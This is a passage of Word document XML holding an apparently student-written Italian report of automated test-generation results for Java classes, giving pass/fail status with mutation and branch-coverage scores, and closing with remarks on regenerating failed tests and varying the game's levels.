    <w:p w14:paraId="1CD3D7A2" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ParameterParser: TEST PASSED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06042A89" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Weak mutations: [0.7181, 0.9253, 0.9711]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084B5EE3" w14:textId="10361211" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Cbranches: [0.5926, 0.7901, 0.8395] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3545B923" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="368C99B4" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Range: TEST PASSED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF15A4B" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Weak mutations: [0.613, 0.8304, 0.9087]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B8EB5B" w14:textId="17F5F8AA" w:rsidR="00BE23CF" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Cbranches: [0.4828, 0.7931, 0.9195] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CFDE54" w14:textId="77777777" w:rsidR="00BE23CF" w:rsidRPr="00715086" w:rsidRDefault="00BE23CF" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C5DA93B" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RationalNumber: TEST PASSED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40322B07" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Weak mutations: [0.6199, 0.9502, 0.9932]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8B749A" w14:textId="05C813B1" w:rsidR="007B1A45" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Cbranches: [0.5441, 0.9265, 0.9412] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B4154C" w14:textId="77777777" w:rsidR="007B1A45" w:rsidRPr="00715086" w:rsidRDefault="007B1A45" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57F7B10F" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ResultSetColumnReader: TEST PASSED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545060E4" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Weak mutations: [0.633, 0.9083, 0.945]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E55FF4" w14:textId="1C56A486" w:rsidR="007935E6" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Cbranches: [0.325, 0.9, 0.9625] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7FB695" w14:textId="77777777" w:rsidR="007935E6" w:rsidRPr="00715086" w:rsidRDefault="007935E6" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5023048B" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ResultSetHelper: TEST PASSED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A722E3F" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Weak mutations: [0.3445, 0.8529, 0.9538]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39651A5A" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Cbranches: [0.542, 0.8702, 0.8855] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7682E784" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16F8B4A8" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>StringParser: TEST PASSED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3754B1" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Weak mutations: [0.2561, 0.4388, 0.8441]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F34A954" w14:textId="1080FD7E" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Cbranches: [0.359, 0.6923, 0.9231] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3250CDF0" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60F94288" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SubjectParser: TEST FAILED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557A4D25" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Weak mutations: [0.3408, 0.8212, 0.8994]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD6D177" w14:textId="3F89836B" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Cbranches: [0.3226, 0.4516, 0.2581] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2E6E83" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06527ED8" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TimeStamp: TEST FAILED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D8E3A3" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Weak mutations: [0.9041, 0.9472, 0.9883]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFA4AD4" w14:textId="19838600" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Cbranches: [0.9535, 0.907, 1.0] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531562F5" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A0D9670" w14:textId="77777777" w:rsidR="00BC5849" w:rsidRPr="00715086" w:rsidRDefault="00BC5849" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="768236D4" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>VCardBean: TEST PASSED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7E5D72" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Weak mutations: [0.5397, 0.8016, 0.8095]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D3D720" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Cbranches: [0.4107, 0.8839, 0.9732] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EC7FBC" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56ED1A4D" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WeakHashtable: TEST PASSED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6116CEFE" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Weak mutations: [0.6149, 0.7453, 0.7516]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC55923" w14:textId="65B87794" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Cbranches: [0.443, 0.5823, 0.6329] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F96636" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AD2FEEE" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>XmlElement: TEST PASSED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8ADE14" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Weak mutations: [0.4909, 0.8705, 0.9705]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49769B81" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Cbranches: [0.4842, 0.8632, 0.9053] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1ECC61" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E935FC2" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>XMLParser: TEST PASSED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CD6A00" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Weak mutations: [0.1597, 0.8739, 0.9328]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0F2F36" w14:textId="6F30E01C" w:rsidR="00E85125" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="007B1A45">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Cbranches: [0.225, 0.875, 0.925] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAF5648" w14:textId="77777777" w:rsidR="007B1A45" w:rsidRPr="00715086" w:rsidRDefault="007B1A45" w:rsidP="007B1A45">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FA20BB5" w14:textId="07F34C1C" w:rsidR="007B1A45" w:rsidRPr="00715086" w:rsidRDefault="007B1A45" w:rsidP="007B1A45">
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve">TEST PASSED : </w:t>
      </w:r>
      <w:r w:rsidR="009C5323" w:rsidRPr="00715086">
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:br/>
        <w:t xml:space="preserve">TEST FAILED : </w:t>
      </w:r>
      <w:r w:rsidR="009C5323" w:rsidRPr="00715086">
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72764E33" w14:textId="77777777" w:rsidR="00BB68F4" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="00BB68F4">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Per quanto riguarda le classi che non hanno superato il test, rieseguendo la generazione potremmo ottenere risultati differenti e quindi superare il test, di conseguenza sono comunque utilizzabili per il gioco.</w:t>
      </w:r>
      <w:r w:rsidR="00BB68F4" w:rsidRPr="00715086">
        <w:br/>
        <w:t>A titolo di esempio abbiamo provato a rigenerare i test per la classe “OutputFormat” che non aveva passato il test, e questi sono i risultati:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329711A6" w14:textId="2C4F1F73" w:rsidR="00BB68F4" w:rsidRPr="00715086" w:rsidRDefault="00BB68F4" w:rsidP="00BB68F4">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:br/>
        <w:t>OutputFormat: TEST PASSED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688CEA83" w14:textId="77777777" w:rsidR="00BB68F4" w:rsidRPr="00715086" w:rsidRDefault="00BB68F4" w:rsidP="00BB68F4">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Weak mutations: [0.7132, 0.9632, 0.9706]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB60E4A" w14:textId="77777777" w:rsidR="00BB68F4" w:rsidRPr="00715086" w:rsidRDefault="00BB68F4" w:rsidP="00BB68F4">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Cbranches: [0.6119, 0.8507, 1.0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358A103C" w14:textId="0D35A2DF" w:rsidR="007B1A45" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="00BB68F4">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:br/>
        <w:t>Inoltre alcuni livelli sono molto simili tra loro, di conseguenze anche in questo caso potrebbe essere utile rifinire il criterio con il quale essi vengono creati per aumentarne la differenziazione.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E62C78B" w14:textId="77777777" w:rsidR="00E85125" w:rsidRPr="00715086" w:rsidRDefault="00E85125" w:rsidP="0055772E"/>
    <w:p w14:paraId="585D5B6C" w14:textId="77777777" w:rsidR="002E1508" w:rsidRPr="00715086" w:rsidRDefault="002E1508" w:rsidP="0055772E"/>
    <w:p w14:paraId="0897DEBC" w14:textId="77777777" w:rsidR="002E1508" w:rsidRPr="00715086" w:rsidRDefault="002E1508" w:rsidP="0055772E"/>
    <w:p w14:paraId="14EBC398" w14:textId="77777777" w:rsidR="00BC5849" w:rsidRPr="00715086" w:rsidRDefault="00BC5849" w:rsidP="0055772E"/>
    <w:p w14:paraId="333CF6B8" w14:textId="77777777" w:rsidR="00BC5849" w:rsidRPr="00715086" w:rsidRDefault="00BC5849" w:rsidP="0055772E"/>
    <w:p w14:paraId="279A4F07" w14:textId="77777777" w:rsidR="00BC5849" w:rsidRPr="00715086" w:rsidRDefault="00BC5849" w:rsidP="0055772E"/>
    <w:p w14:paraId="3FAE9ED4" w14:textId="77777777" w:rsidR="00BC5849" w:rsidRPr="00715086" w:rsidRDefault="00BC5849" w:rsidP="0055772E"/>
    <w:p w14:paraId="55F3AA46" w14:textId="77777777" w:rsidR="00BC5849" w:rsidRPr="00715086" w:rsidRDefault="00BC5849" w:rsidP="0055772E"/>
    <w:p w14:paraId="7B9BFDC7" w14:textId="77777777" w:rsidR="00BC5849" w:rsidRPr="00715086" w:rsidRDefault="00BC5849" w:rsidP="0055772E"/>
    <w:p w14:paraId="39401254" w14:textId="77777777" w:rsidR="00BC5849" w:rsidRPr="00715086" w:rsidRDefault="00BC5849" w:rsidP="0055772E"/>
